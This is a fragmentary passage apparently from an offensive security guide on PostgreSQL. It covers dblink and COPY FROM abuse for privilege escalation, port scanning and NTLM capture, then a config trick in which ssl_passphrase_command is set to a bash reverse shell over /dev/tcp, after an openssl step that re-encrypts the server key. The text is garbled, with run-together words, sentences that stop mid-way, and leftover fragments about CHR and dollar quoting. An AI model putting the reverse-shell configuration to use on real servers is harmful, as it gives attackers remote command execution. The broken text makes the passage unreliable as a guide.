dblinkis a PostgreSQL module that offers several interesting options from the attacker point of view. It can be used to connect to other PostgreSQL instances of perform TCP connections. These functionalities along with the
COPY FROMfunctionality can be used to escalate privileges, perform port scanning or grab NTLM challenge responses. You can read here how to perform these attacked.
copycannot be used to write binary files as it modify some binary values.
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'Path to the private key of the database
ssl_passphrase_command = ''If the private file is protected by password (encrypted) postgresql will execute the command indicated in this attribute.
ssl_passphrase_command_supports_reload = offIf this attribute is on the command executed if the key is protected by password will be executed when
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
CHRfor basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):
$. This queries return the same results: